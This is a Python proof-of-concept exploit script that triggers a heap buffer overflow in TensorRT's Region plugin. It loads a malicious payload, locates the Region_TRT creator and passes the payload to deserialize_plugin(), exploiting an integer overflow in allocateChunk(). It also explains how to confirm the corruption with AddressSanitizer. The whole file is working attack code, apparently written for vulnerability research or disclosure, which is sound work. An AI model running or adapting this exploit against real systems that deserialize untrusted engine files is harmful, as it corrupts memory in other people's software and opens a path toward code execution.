#!/usr/bin/env python3
"""
Trigger TensorRT Region plugin heap overflow via deserialize_plugin().

This script loads a malicious serialized payload and feeds it to
RegionPluginCreator.deserialize_plugin(), which internally calls
Region::Region(buffer, length) — the vulnerable deserialization constructor.

Requirements:
  - TensorRT Python package (pip install tensorrt)
  - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source
    https://github.com/NVIDIA/TensorRT

For ASan detection, build the OSS plugins with:
  cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address"
  make -j$(nproc) nvinfer_plugin

The Python interpreter itself is not instrumented, so the ASan runtime usually
has to be preloaded when an ASan-built library is dlopen()ed, e.g.:
  LD_PRELOAD=$(gcc -print-file-name=libasan.so) python3 trigger_deserialize.py

Usage:
  python3 gen_payload.py                        # generates malicious_region_payload.bin
  python3 trigger_deserialize.py                # triggers the heap overflow
  python3 trigger_deserialize.py payload.bin    # use an explicit payload file
"""

import ctypes
import glob
import os
import struct
import sys

# Creator name registered by the OSS plugin library for the Region plugin.
REGION_PLUGIN_NAME = "Region_TRT"
# Payload file used when no path is given on the command line.
DEFAULT_PAYLOAD_FILE = "malicious_region_payload.bin"


def find_and_load_plugin_lib():
    """Locate libnvinfer_plugin.so (an OSS build is preferred) and return its path.

    Despite the name, this function only *searches*; loading is done by
    ``main()``. Candidates are checked in order: local OSS build trees, the
    Debian/Ubuntu system location, then each directory in LD_LIBRARY_PATH.

    Returns:
        The first candidate that is an existing regular file, or None.
    """
    search_paths = [
        # Built from TensorRT OSS source (first entry is relative to the CWD).
        "TensorRT/build/out/libnvinfer_plugin.so",
        "/content/TRT/build/out/libnvinfer_plugin.so",
        # Docker container
        "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so",
    ]
    # Also search LD_LIBRARY_PATH. Entries are escaped so that directory names
    # containing glob metacharacters ("[", "*", "?") are matched literally;
    # empty entries (e.g. from "::" or an unset variable) are skipped.
    search_paths.extend(
        os.path.join(glob.escape(directory), "libnvinfer_plugin.so")
        for directory in os.environ.get("LD_LIBRARY_PATH", "").split(os.pathsep)
        if directory
    )

    for pattern in search_paths:
        for match in sorted(glob.glob(pattern)):
            # isfile (not exists): a directory with the library's name is useless.
            if os.path.isfile(match):
                return match
    return None


def _load_plugin_library(path):
    """dlopen *path* with RTLD_GLOBAL and register its plugin creators.

    Returns:
        True if the library loaded and initLibNvInferPlugins() returned true,
        False otherwise (a message explaining why is printed).
    """
    try:
        lib = ctypes.CDLL(path, mode=ctypes.RTLD_GLOBAL)
        init_plugins = lib.initLibNvInferPlugins
    except (OSError, AttributeError) as err:
        print(f"[!] Failed to load {path}: {err}")
        return False

    # bool initLibNvInferPlugins(void* logger, char const* libNamespace)
    init_plugins.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    init_plugins.restype = ctypes.c_bool
    if not init_plugins(None, b""):
        print("[!] initLibNvInferPlugins() returned false")
        return False
    return True


def _find_region_creator(trt):
    """Return the registered Region_TRT plugin creator, or None if absent."""
    registry = trt.get_plugin_registry()
    # `all_creators` is only present on newer TensorRT registries; fall back to
    # the older `plugin_creator_list` property when it is missing.
    creators = getattr(registry, "all_creators", None)
    if creators is None:
        creators = registry.plugin_creator_list
    return next((c for c in creators if c.name == REGION_PLUGIN_NAME), None)


def _print_payload_header(payload):
    """Print the payload's leading fields for display only.

    Layout read here: six little-endian int32 values at offset 0, eight flag
    bytes at offset 24, and one little-endian int32 count at offset 32.
    Shorter payloads print only what is available.
    """
    if len(payload) < 32:
        return
    C, H, W, num, classes, coords = struct.unpack_from("<6i", payload, 0)
    flags = list(payload[24:32])
    print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}")
    print(f"[*] Flags: softmaxTree={flags[0]} leaf={flags[1]}")
    if len(payload) >= 36:
        n_val = struct.unpack_from("<i", payload, 32)[0]
        print(f"[*] n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})")
        # Python ints do not overflow; mask to 32 bits to show the C result.
        print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{(n_val * 4) & 0xFFFFFFFF:08x} (truncated)")


def main():
    """Load the payload, locate Region_TRT, and call deserialize_plugin() on it.

    The payload path is taken from argv[1] (default: DEFAULT_PAYLOAD_FILE).
    Exits with status 1 if the payload cannot be read, TensorRT is not
    installed, or the Region_TRT creator is not registered.
    """
    payload_file = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_PAYLOAD_FILE
    try:
        with open(payload_file, "rb") as f:
            payload = f.read()
    except FileNotFoundError:
        print(f"[-] {payload_file} not found. Run gen_payload.py first.")
        sys.exit(1)
    except OSError as err:
        print(f"[-] Cannot read {payload_file}: {err}")
        sys.exit(1)
    print(f"[+] Loaded {payload_file}: {len(payload)} bytes")

    # Load TensorRT
    try:
        import tensorrt as trt
    except ImportError:
        print("[-] TensorRT Python package not found. Install with: pip install tensorrt")
        sys.exit(1)
    print(f"[+] TensorRT {trt.__version__}")

    # Load OSS plugin library (contains Region_TRT)
    plugin_path = find_and_load_plugin_lib()
    if plugin_path:
        print(f"[+] Loading plugin lib: {plugin_path}")
        if not _load_plugin_library(plugin_path):
            print("[!] Falling back to default registry...")
    else:
        print("[!] OSS plugin library not found, trying default registry...")

    region_creator = _find_region_creator(trt)
    if region_creator is None:
        print("[-] Region_TRT plugin not found in registry.")
        print("    Build TensorRT OSS plugins first:")
        print("    git clone https://github.com/NVIDIA/TensorRT.git")
        print("    cd TensorRT && mkdir build && cd build")
        print("    cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF")
        print("    make -j$(nproc) nvinfer_plugin")
        sys.exit(1)
    print(f"[+] Region_TRT v{region_creator.plugin_version}")

    _print_payload_header(payload)

    print()
    print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...")
    print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow")
    print("[!] Expected: heap-buffer-overflow (visible with ASan)")
    print()

    try:
        bad_plugin = region_creator.deserialize_plugin("region", payload)
    except Exception as e:  # top-level boundary: report whatever the binding raises
        print(f"[!] Exception during deserialization: {e}")
    else:
        print(f"[+] Plugin deserialized (returned: {bad_plugin})")
        print("[!] Without ASan, the heap overflow is silent but corruption has occurred.")
        print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.")


if __name__ == "__main__":
    main()